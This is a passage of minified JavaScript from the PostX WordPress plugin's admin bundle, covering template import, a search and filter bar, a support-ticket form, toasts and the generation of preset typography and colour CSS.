l=t.templates?.filter((e=>!E.includes(e.name)));l.length>0&&(j({...O,content:!0}),wp.apiFetch({path:"/ultp/v3/starter_import_content",method:"POST",data:{excludepages:JSON.stringify(E),api_endpoint:e,importDummy:S.importDummy,installPlugin:S?.installPlugin}}).then((e=>{clearInterval(n),o(a+1,100,50),setTimeout((()=>{k(!1),j({...O,content:!1})}),50*(100-a+2)),e.success||F(!0)})).catch((e=>{console.log(e),o(a+1,100,50),setTimeout((()=>{k(!1),j({...O,content:!1})}),50*(100-a+2))})))}})("https://postxkit.wpxpo.com/"+t.live)},__("Start Importing","ultimate-post"))),(0,a.createElement)("button",{onClick:()=>{y||(M(v),x(!1),N(0),k(!1),w(!1))},className:"ultp-popup-close "+(y?"s_loading":"")},o.ZP.close_line)))))}},6488:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var a=n(7294),r=n(4766),o=n(2402),i=n(7763),l=n(5324);const{__}=wp.i18n,s=e=>{const{changeStates:t,column:n,showWishList:s,_fetchFile:p,fetching:c,searchQuery:d,fields:u,fieldValue:m,fieldOptions:f,useState:h,useEffect:g,useRef:v}=e;return(0,a.createElement)("div",{className:"ultp-templatekit-layout-search-container"},(0,a.createElement)("div",{className:"ultp-templatekit-search-container"},u?.filter&&(0,a.createElement)(a.Fragment,null," ",(0,a.createElement)("span",null,__("Filter:","ultimate-post")),(0,a.createElement)(l.Z,{useState:h,useEffect:g,useRef:v,value:m?.filter,contentWH:{height:"190px",width:"150px"},onChange:e=>{t("filter",e)},options:f?.filterArr||[]})),u?.trend&&m?.trend&&(0,a.createElement)(l.Z,{useState:h,useEffect:g,useRef:v,value:m?.trend,onChange:e=>{t("trend",e)},options:[{value:"all",label:__("Popular / Latest","ultimate-post")},{value:"popular",label:__("Popular","ultimate-post")},{value:"latest",label:__("Latest","ultimate-post")}]}),u?.freePro&&(0,a.createElement)(l.Z,{useState:h,useEffect:g,useRef:v,value:m?.freePro,onChange:e=>{t("freePro",e)},options:[{value:"all",label:__("Free / Pro","ultimate-post")},{value:"free",label:__("Free","ultimate-post")},{value:"pro",label:__("Pro","ultimate-post")}]})),(0,a.createElement)("div",{className:"ultp-templatekit-layout-container"},(0,a.createElement)(o.Z,{changeStates:t,searchQuery:d}),(0,a.createElement)("span",{className:"ultp-templatekit-iconcol2 "+("2"==n?"ultp-lay-active":""),onClick:()=>t("column","2")},i.Z.grid_col1),(0,a.createElement)("span",{className:"ultp-templatekit-iconcol3 "+("3"==n?"ultp-lay-active":""),onClick:()=>t("column","3")},i.Z.grid_col2),(0,a.createElement)("div",{className:"ultp-premade-wishlist-con"},(0,a.createElement)("span",{className:"ultp-premade-wishlist cursor "+(s?"ultp-wishlist-active":""),onClick:()=>{t("wishlist",!s)}},r.ZP[s?"love_solid":"love_line"])),p&&(0,a.createElement)("div",{onClick:()=>p(),className:"ultp-filter-sync"},(0,a.createElement)("span",{className:"dashicons dashicons-update-alt "+(c?" rotate":"")}),__("Synchronize","ultimate-post"))))}},58:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294);n(3358);const{__}=wp.i18n,r=()=>(0,a.createElement)("input",{type:"file",name:"attachment",accept:"image/png, image/jpeg",className:"xpo-input-support",id:"xpo-support-file-input"}),o=()=>{const[e,t]=(0,a.useState)(!1),[n,o]=(0,a.useState)(!1),[i,l]=(0,a.useState)(!1),s=(0,a.useRef)(null),p=(0,a.useRef)(null);return(0,a.useEffect)((()=>{!e&&i&&l(!1)}),[e,i]),(0,a.useEffect)((()=>{const n=new AbortController;if(e)return document.addEventListener("mousedown",(e=>{s.current&&!s.current.contains(e.target)&&(t(!1),l(!1))}),{signal:n.signal}),()=>{n.abort()}}),[e]),(0,a.createElement)("div",{ref:s},(0,a.createElement)("span",{className:"xpo-support-pops-btn xpo-support-pops-btn--small "+(e?"xpo-support-pops-btn--big":""),onClick:()=>t((e=>!e)),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&t((e=>!e))}},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"28",height:"28",fill:"none",viewBox:"0 0 28 28"},(0,a.createElement)("path",{fill:"var(--xpo-support-color-reverse)",fillRule:"evenodd",d:"M27.3 14c0 7.4-6 13.3-13.3 13.3H.7l3.9-3.9A13.3 13.3 0 0 1 14 .7c7.4 0 13.3 6 13.3 13.3Zm-19 1.7a1.7 1.7 0 1 0 0-3.4 1.7 1.7 0 0 0 0 3.4Zm7.4-1.7a1.7 1.7 0 1 1-3.4 0 1.7 1.7 0 0 1 3.4 0Zm5.6 0a1.7 1.7 0 1 1-3.3 0 1.7 1.7 0 0 1 3.3 0Z",clipRule:"evenodd"}))),e&&(0,a.createElement)("div",{className:`xpo-support-pops-container ${e?"xpo-support-entry-anim":""} ${i?"":"xpo-support-pops-container--full-height"}`},(0,a.createElement)("div",{className:"xpo-support-pops-header"},(0,a.createElement)("div",{style:{maxHeight:i?"0px":"140px",opacity:i?"0":"1",transition:"max-height 0.3s, opacity 0.3s"}},(0,a.createElement)("div",{className:"xpo-support-header-bg"}),(0,a.createElement)("div",{className:"xpo-support-pops-avatars"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/support/1.png",alt:"WPXPO"}),(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/support/2.jpg",alt:"A. Owadud Bhuiyan"}),(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/support/3.jpg",alt:"Abdullah Al Mahmud"}),(0,a.createElement)("div",{className:"xpo-support-signal-green xpo-support-signal"})),(0,a.createElement)("div",{className:"xpo-support-pops-text"},"Questions? Create an Issue!"))),(0,a.createElement)("div",{className:"xpo-support-chat-body"},(0,a.createElement)("div",{style:{maxHeight:i?"174px":"0px",opacity:i?"1":"0",transition:"max-height 0.3s, opacity 0.3s"}},i&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"xpo-support-thankyou-icon"},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"xpo-support-animation"},(0,a.createElement)("circle",{className:"xpo-support-circle",cx:"26",cy:"26",r:"25",fill:"none"}),(0,a.createElement)("path",{className:"xpo-support-check",fill:"none",d:"M14.1 27.2l7.1 7.2 16.7-16.8"}))),(0,a.createElement)("div",{className:"xpo-support-thankyou-title"},__("Thank You!","ultimate-post")),(0,a.createElement)("div",{className:"xpo-support-thankyou-subtitle"},__("Your message has been received. We will contact you soon on your email with a response. Stay connected and check mail!","ultimate-post")))),(0,a.createElement)("form",{ref:p,onSubmit:e=>{if(n)return;e.preventDefault(),o(!0);const t=new FormData(e.target);fetch("https://wpxpo.com/wp-json/v2/support_mail",{method:"POST",body:t}).then((e=>{if(!e.ok)throw new Error("Failed to submit ticket");l(!0),p.current&&p.current.reset()})).catch((e=>{console.log(e)})).finally((()=>{o(!1)}))},encType:"multipart/form-data",style:{maxHeight:i?"0px":"376px",opacity:i?"0":"1",transition:"max-height 0.3s, opacity 0.3s"}},(0,a.createElement)("input",{type:"hidden",name:"user_name",defaultValue:ultp_dashboard_pannel.userInfo.name}),(0,a.createElement)("input",{type:"email",name:"user_email",className:"xpo-input-support",defaultValue:ultp_dashboard_pannel.userInfo.email,required:!0}),(0,a.createElement)("input",{type:"hidden",name:"subject",value:"Support from PostX"}),(0,a.createElement)("div",{className:"xpo-support-title"},__("Message","ultimate-post")),(0,a.createElement)("textarea",{name:"desc",className:"xpo-input-support",placeholder:"Write your message here..."}),(0,a.createElement)(r,null),(0,a.createElement)("button",{type:"submit",className:"xpo-send-button",disabled:n},n?(0,a.createElement)(a.Fragment,null,"Sending",(0,a.createElement)("div",{className:"xpo-support-loading"})):(0,a.createElement)(a.Fragment,null,"Send",(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"21",height:"20",fill:"none",viewBox:"0 0 21 20"},(0,a.createElement)("path",{fill:"var(--xpo-support-color-reverse)",d:"M18.4 10c0-.6-.3-1.1-.8-1.4L5 2c-.6-.3-1.2-.3-1.7 0-.6.4-.9 1.3-.7 1.9l1.2 4.8c0 .5.5.8 1 .8h7c.3 0 .6.3.6.6 0 .4-.3.6-.6.6h-7c-.5 0-1 .4-1 .9l-1.3 4.8c-.1.6 0 1.1.5 1.5l.1.2c.5.4 1.2.4 1.8.1l12.5-6.6c.6-.3 1-.9 1-1.5Z"}))))))))}},1389:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(6509);const r=e=>{const{title:t,modalContent:n,setModalContent:r}=e;return(0,a.createElement)("div",{className:"ultp-dashboard-modal-wrapper",onClick:e=>{e.target?.closest(".ultp-dashboard-modal")||r("")}},(0,a.createElement)("div",{className:"ultp-dashboard-modal"},(0,a.createElement)("div",{className:"ultp-modal-header"},t&&(0,a.createElement)("span",{className:"ultp-modal-title"},t),(0,a.createElement)("a",{className:"ultp-popup-close",onClick:()=>r("")})),(0,a.createElement)("div",{className:"ultp-modal-body"},n)))}},8949:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(619);const r=e=>{const{type:t,size:n,loop:r,unit:o,c_s:i,classes:l}=e,s=()=>{let e={};switch(t){case"image":case"circle":e={width:n?n+"px":"300px",height:n?n+"px":"300px"};break;case"title":e={width:`${n||"100"}${o||"%"}`};break;case"button":e={width:n?n+"px":"90px"};break;case"custom_size":e={width:`${i.size1?i.size1:"100"}${i.unit1?i.unit1:"%"}`,height:`${i.size2?i.size2:"20"}${i.unit2?i.unit2:"px"}`,borderRadius:i.br?i.br+"px":"0px"}}return e};return(0,a.createElement)(a.Fragment,null,r?(0,a.createElement)(a.Fragment,null,Array(parseInt(r)).fill("1").map(((e,n)=>(0,a.createElement)("div",{key:n,className:`ultp_skeleton__${t} ultp_frequency loop ${l||""}`,style:s()})))):(0,a.createElement)("div",{className:`ultp_skeleton__${t} ultp_frequency ${l||""}`,style:s()}))}},356:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(2413);const{__}=wp.i18n,r=({delay:e,toastMessages:t,setToastMessages:n})=>{const[r,o]=(0,a.useState)(!0),[i,l]=(0,a.useState)("show");return(0,a.useEffect)((()=>{const t=setTimeout((()=>{o(!1),l(""),n({state:!1,status:""})}),e);return()=>clearTimeout(t)}),[e]),(0,a.createElement)("div",{className:"toast"},r&&t.status&&t.messages.length>0&&(0,a.createElement)("div",{className:"toastMessages"},t.messages.map(((e,r)=>(0,a.createElement)("span",{key:`toast_${Date.now().toString()}_${r}`},(0,a.createElement)("div",{className:`toaster ${i}`},(0,a.createElement)("span",null,"error"==t.status?(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"animation",stroke:"currentColor"},(0,a.createElement)("circle",{cx:"26",cy:"26",r:"25",fill:"none",className:"circle cross"}),(0,a.createElement)("path",{fill:"none",d:"M 12,12 L 40,40 M 40,12 L 12,40",className:"check"})):(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"animation",stroke:"currentColor"},(0,a.createElement)("circle",{className:"circle",cx:"26",cy:"26",r:"25",fill:"none"}),(0,a.createElement)("path",{className:"check",fill:"none",d:"M14.1 27.2l7.1 7.2 16.7-16.8"}))),(0,a.createElement)("span",{className:"itmCenter"},e),(0,a.createElement)("span",{className:"itmLast",onClick:()=>(e=>{let a=[...t.messages];a=a.filter(((t,n)=>n!==e)),n({...t,messages:a})})(r)},__("Close","ultimate-post"))))))))}},448:(e,t,n)=>{"use strict";n.d(t,{AJ:()=>o,cC:()=>l,x2:()=>r});var a=n(2030);const{__}=wp.i18n,r=(e,t,n,a)=>{wp.apiFetch({path:"/ultp/v1/postx_presets",method:"POST",data:{type:e,key:t,data:n}}).then((r=>{r.success&&("set"==e&&i(t,n),a&&a(r))}))},o=(e,t="",n=!1)=>{if("typoStacks"==e)return[[{type:"sans-serif",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"serif",weight:600,family:"Roboto Slab"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:600,family:"Jost"},{type:"sans-serif",weight:400,family:"Jost"}],[{type:"display",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"serif",weight:700,family:"Arvo"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:700,family:"Merriweather"},{type:"sans-serif",weight:400,family:"Merriweather"}],[{type:"sans-serifs",weight:500,family:"Oswald"},{type:"sans-serif",weight:400,family:"Source Sans Pro"}],[{type:"display",weight:400,family:"Abril Fatface"},{type:"sans-serif",weight:400,family:"Poppins"}],[{type:"serif",weight:700,family:"Cardo"},{type:"sans-serif",weight:400,family:"Inter"}]];if("multipleTypos"==e)return{Body_and_Others_typo:["body_typo","paragraph_1_typo","paragraph_2_typo","paragraph_3_typo"],Heading_typo:["heading_h1_typo","heading_h2_typo","heading_h3_typo","heading_h4_typo","heading_h5_typo","heading_h6_typo"]};if("presetTypoKeys"==e)return["Heading_typo","Body_and_Others_typo"];if("colorStacks"==e)return[["#f4f4ff","#dddff8","#B4B4D6","#3323f0","#4a5fff","#1B1B47","#545472","#262657","#10102e"],["#ffffff","#f7f4ed","#D6D1B4","#fab42a","#f4cd4e","#3B3118","#6F6C53","#483d1f","#29230f"],["#ffffff","#eaf7ea","#C2DBBF","#3b9138","#54a757","#1E381A","#586E56","#23411f","#162c11"],["#fdf7ff","#eadef5","#C1B4D6","#8749d0","#995ede","#301B42","#635472","#38204e","#231133"],["#fffcfc","#fce5ec","#D6B4BC","#f01f50","#ff5878","#431B23","#72545B","#4d2029","#36141b"],["#ffffff","#ecf3f8","#B4C2D6","#2890e8","#6cb0f4","#1D3347","#4B586C","#2c4358","#10202b"],["#f8f3ed","#f2e2d0","#D6C4B4","#dd8336","#f09f4d","#3D2A1D","#6E5F52","#483324","#2e1e11"],["#ffffff","#faf0f4","#D6B4CF","#d948a2","#e56ab5","#401B2E","#725468","#4e2239","#290e1d"],["#f2f7ea","#e1e6c4","#D2DBBF","#829d46","#a1c36b","#30371A","#5F6551","#38401f","#242e10"],["#ffffff","#e9f7f3","#B5D1C7","#3cbe8b","#59d5a5","#1C3D3F","#46675E","#20484b","#153234"]];if("presetColorKeys"==e)return["Base_1_color","Base_2_color","Base_3_color","Primary_color","Secondary_color","Tertiary_color","Contrast_3_color","Contrast_2_color","Contrast_1_color"];if("presetGradientKeys"==e)return["Cold_Evening_gradient","Purple_Division_gradient","Over_Sun_gradient","Morning_Salad_gradient","Fabled_Sunset_gradient"];if("styleCss"==e){let e=":root { ";return Object.keys(t).forEach(((a,r)=>{if(!["rootCSS","globalColorCSS"].includes(a)){const r=a,o=t[a]?.hasOwnProperty("openColor")?"color"==t[a].type?t[a].color:t[a].gradient:t[a]||n||"";e+=`--postx_preset_${r}: ${o}; `}})),e+=" }",e}if("typoCSS"==e){const e=o("multipleTypos");let r="",i=":root { ";const l=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"];return Object.keys(t).forEach(((o,s)=>{const p=t[o],c=!![...e.Body_and_Others_typo,...e.Heading_typo].includes(o);if(!["rootCSS","presetTypoCSS"].includes(o)&&"object"==typeof p&&Object.keys(p).length){const e=!l.includes(p.family),t=n?ultp_dashboard_pannel:ultp_data;!((!t?.settings?.hasOwnProperty("disable_google_font")||"yes"==t?.settings.disable_google_font)&&t?.settings?.hasOwnProperty("disable_google_font"))&&e&&p.family&&!p.family.includes("--postx_preset")&&!r.includes(p.family.replace(" ","+")+":")&&void 0!==a.Z&&(r+="@import url('https://fonts.googleapis.com/css?family="+p.family.replace(" ","+")+":"+(a.Z?.filter((e=>e.n==p.family))[0]?.v||[]).join(",")+"'); "),c||(i+=p.family?`--postx_preset_${o}_font_family: ${p.family}; `:"",i+=p.family?`--postx_preset_${o}_font_family_type: ${p.type||"sans-serif"}; `:"",i+=p.weight?`--postx_preset_${o}_font_weight: ${p.weight}; `:"",i+=p.style?`--postx_preset_${o}_font_style: ${p.style}; `:"",i+=p.decoration?`--postx_preset_${o}_text_decoration: ${p.decoration}; `:"",i+=p.transform?`--postx_preset_${o}_text_transform: ${p.transform}; `:"",i+=p.spacing?.lg?`--postx_preset_${o}_letter_spacing_lg: ${p.spacing.lg}${p.spacing.ulg||"px"}; `:"",i+=p.spacing?.sm?`--postx_preset_${o}_letter_spacing_sm: ${p.spacing.sm}${p.spacing.usm||"px"}; `:"",i+=p.spacing?.xs?`--postx_preset_${o}_letter_spacing_xs: ${p.spacing.xs}${p.spacing.uxs||"px"}; `:""),i+=p.size?.lg?`--postx_preset_${o}_font_size_lg: ${p.size.lg}${p.size.ulg||"px"}; `:"",i+=p.size?.sm?`--postx_preset_${o}_font_size_sm: ${p.size.sm}${p.size.usm||"px"}; `:"",i+=p.size?.xs?`--postx_preset_${o}_font_size_xs: ${p.size.xs}${p.size.uxs||"px"}; `:"",i+=p.height?.lg?`--postx_preset_${o}_line_height_lg: ${p.height.lg}${p.height.ulg||"px"}; `:"",i+=p.height?.sm?`--postx_preset_${o}_line_height_sm: ${p.height.sm}${p.height.usm||"px"}; `:"",i+=p.height?.xs?`--postx_preset_${o}_line_height_xs: ${p.height.xs}${p.height.uxs||"px"}; `:""}})),i+="}",r+i}if("font_load"==e){let e="";const a=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],r=n?ultp_dashboard_pannel:ultp_data,o=!((!r.settings?.hasOwnProperty("disable_google_font")||"yes"==r.settings.disable_google_font)&&r.settings?.hasOwnProperty("disable_google_font"));if("object"==typeof t&&Object.keys(t).length){const n=!a.includes(t.family);o&&n&&t.family&&(e+="@import url('https://fonts.googleapis.com/css?family="+t.family.replace(" ","+")+":"+t.weight+"'); ")}return e}if("font_load_all"==e){const e=["Roboto","Roboto Slab","Jost","Arvo","Merriweather","Oswald","Abril Fatface","Cardo","Source Sans Pro","Poppins","Inter"],t=["400,500","600","400,600","700","400,700","500","400","700","400","400","400"];let a="";const r=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],o=n?ultp_dashboard_pannel:ultp_data,i=!((!o.settings?.hasOwnProperty("disable_google_font")||"yes"==o.settings.disable_google_font)&&o.settings?.hasOwnProperty("disable_google_font"));return e.forEach(((e,n)=>{const o=!r.includes(e);i&&o&&e&&(a+="@import url('https://fonts.googleapis.com/css?family="+e.replace(" ","+")+":"+t[n]+"'); ")})),a}if("bgCSS"==e){let e={};const n="object"==typeof t?{...t}:{};if("color"==n.type)e.backgroundColor=n.color;else if("gradient"==n.type&&n.gradient){let t=n.gradient;"object"==typeof n.gradient&&(t="linear"==n.gradient.type?"linear-gradient("+n.gradient.direction+"deg, "+n.gradient.color1+" "+n.gradient.start+"%,"+n.gradient.color2+" "+n.gradient.stop+"%);":"radial-gradient( circle at "+n.gradient.radial+" , "+n.gradient.color1+" "+n.gradient.start+"%,"+n.gradient.color2+" "+n.gradient.stop+"%);"),e.backgroundImage=t}else if("image"==n.type){var r;(n.fallbackColor||n.color)&&(e.backgroundColor=null!==(r=n.fallbackColor)&&void 0!==r?r:n.color),n.image&&(e.backgroundImage='url("'+n.image+'")',n.position&&(e.backgroundPositionX=100*n.position.x+"%",e.backgroundPositionY=100*n.position.y+"%"),n.attachment&&(e.backgroundAttachments=n.attachment),n.repeat&&(e.backgroundRepeat=n.repeat),n.size&&(e.backgroundSize=n.size))}else"video"==n.type&&n.fallback&&(e.backgroundImage='url("'+n.fallback+'")',e.backgroundSize="cover",e.backgroundPosition="50% 50%");return e}if("globalCSS"==e){let e=`:root {\n            --preset-color1: ${t.presetColor1||"#037fff"}\n            --preset-color2: ${t.presetColor2||"#026fe0"}\n            --preset-color3: ${t.presetColor3||"#071323"}\n            --preset-color4: ${t.presetColor4||"#132133"}\n            --preset-color5: ${t.presetColor5||"#34495e"}\n            --preset-color6: ${t.presetColor6||"#787676"}\n            --preset-color7: ${t.presetColor7||"#f0f2f3"}\n            --preset-color8: ${t.presetColor8||"#f8f9fa"}\n            --preset-color9: ${t.presetColor9||"#ffffff"}\n        }`;return t.enablePresetColorCSS&&(e+="\n            html body.postx-admin-page .editor-styles-wrapper,\n            html body.postx-admin-page .editor-styles-wrapper p,\n            html body.postx-page,\n            html body.postx-page p,\n            html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n            body.block-editor-iframe__body, body.block-editor-iframe__body p\n            { \n                color: var(--postx_preset_Contrast_2_color); \n            }\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n            {\n                color: var(--postx_preset_Contrast_1_color);\n            }\n            html.colibri-wp-theme body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h6 \n            {\n                color: var(--postx_preset_Contrast_1_color);\n            }\n\n            body.block-editor-iframe__body h1,\n            body.block-editor-iframe__body h2,\n            body.block-editor-iframe__body h3,\n            body.block-editor-iframe__body h4,\n            body.block-editor-iframe__body h5,\n            body.block-editor-iframe__body h6\n            { \n                color: var(--postx_preset_Contrast_1_color);\n            }\n            ",t.gbbodyBackground.openColor&&(e+=`\n                    html body.postx-admin-page .editor-styles-wrapper, html body.postx-page,\n                    html body.postx-admin-page.block-editor-page.post-content-style-boxed .editor-styles-wrapper::before,\n                    html.colibri-wp-theme body.postx-page,\n                    body.block-editor-iframe__body\n                    { ${(e=>{let t=e.clip?"-webkit-background-clip: text; -webkit-text-fill-color: transparent;":"";if("color"==e.type)t+=e.color?"background-color: "+e.color+";":"";else if("gradient"==e.type&&e.gradient)"object"==typeof e.gradient?"linear"==e.gradient.type?t+="background-image : linear-gradient("+e.gradient.direction+"deg, "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image : radial-gradient( circle at "+e.gradient.radial+" , "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image:"+e.gradient+";";else if("image"==e.type){var n;(e.fallbackColor||e.color)&&(t+="background-color:"+(null!==(n=e.fallbackColor)&&void 0!==n?n:e.color)+";"),e.image&&(t+='background-image: url("'+e.image+'");'+(e.position?"background-position-x:"+100*e.position.x+"%;background-position-y:"+100*e.position.y+"%;":"")+(e.attachment?"background-attachment:"+e.attachment+";":"")+(e.repeat?"background-repeat:"+e.repeat+";":"")+(e.size?"background-size:"+e.size+";":""))}return t})(t.gbbodyBackground)} }\n                `)),t.enablePresetTypoCSS&&(e+=`\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            html.colibri-wp-theme body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            body.block-editor-iframe__body h1,\n            body.block-editor-iframe__body h2,\n            body.block-editor-iframe__body h3,\n            body.block-editor-iframe__body h4,\n            body.block-editor-iframe__body h5,\n            body.block-editor-iframe__body h6\n            { \n                font-family: var(--postx_preset_Heading_typo_font_family),var(--postx_preset_Heading_typo_font_family_type); \n                font-weight: var(--postx_preset_Heading_typo_font_weight);\n                font-style: var(--postx_preset_Heading_typo_font_style);\n                text-transform: var(--postx_preset_Heading_typo_text_transform);\n                text-decoration: var(--postx_preset_Heading_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_lg, normal);\n            }\n            html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n            html.colibri-wp-theme body.postx-page h1,\n            body.block-editor-iframe__body h1\n            { \n                font-size: var(--postx_preset_heading_h1_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h1_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h2,\n            body.block-editor-iframe__body h2\n            { \n                font-size: var(--postx_preset_heading_h2_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h2_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h3,\n            body.block-editor-iframe__body h3\n            { \n                font-size: var(--postx_preset_heading_h3_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h3_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h4,\n            body.block-editor-iframe__body h4\n            { \n                font-size: var(--postx_preset_heading_h4_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h4_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h5,\n            body.block-editor-iframe__body h5\n            { \n                font-size: var(--postx_preset_heading_h5_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h5_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n            html.colibri-wp-theme body.postx-page h6,\n            body.block-editor-iframe__body h6\n            { \n                font-size: var(--postx_preset_heading_h6_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h6_typo_line_height_lg, normal) !important;\n            }\n\n            @media (max-width: ${t.breakpointSm||991}px) {\n                html body.postx-admin-page .editor-styles-wrapper h1 , html body.postx-page h1,\n                html body.postx-admin-page .editor-styles-wrapper h2 , html body.postx-page h2,\n                html body.postx-admin-page .editor-styles-wrapper h3 , html body.postx-page h3,\n                html body.postx-admin-page .editor-styles-wrapper h4 , html body.postx-page h4,\n                html body.postx-admin-page .editor-styles-wrapper h5 , html body.postx-page h5,\n                html body.postx-admin-page .editor-styles-wrapper h6 , html body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n                html.colibri-wp-theme body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n                body.block-editor-iframe__body h1,\n                body.block-editor-iframe__body h2,\n                body.block-editor-iframe__body h3,\n                body.block-editor-iframe__body h4,\n                body.block-editor-iframe__body h5,\n                body.block-editor-iframe__body h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h1,\n                body.block-editor-iframe__body h1\n                {\n                    font-size: var(--postx_preset_heading_h1_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h1_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h2,\n                body.block-editor-iframe__body h2\n                {\n                    font-size: var(--postx_preset_heading_h2_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h2_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h3,\n                body.block-editor-iframe__body h3\n                {\n                    font-size: var(--postx_preset_heading_h3_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h3_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h4,\n                body.block-editor-iframe__body h4\n                {\n                    font-size: var(--postx_preset_heading_h4_typo_font_size_sm, initial);\n                    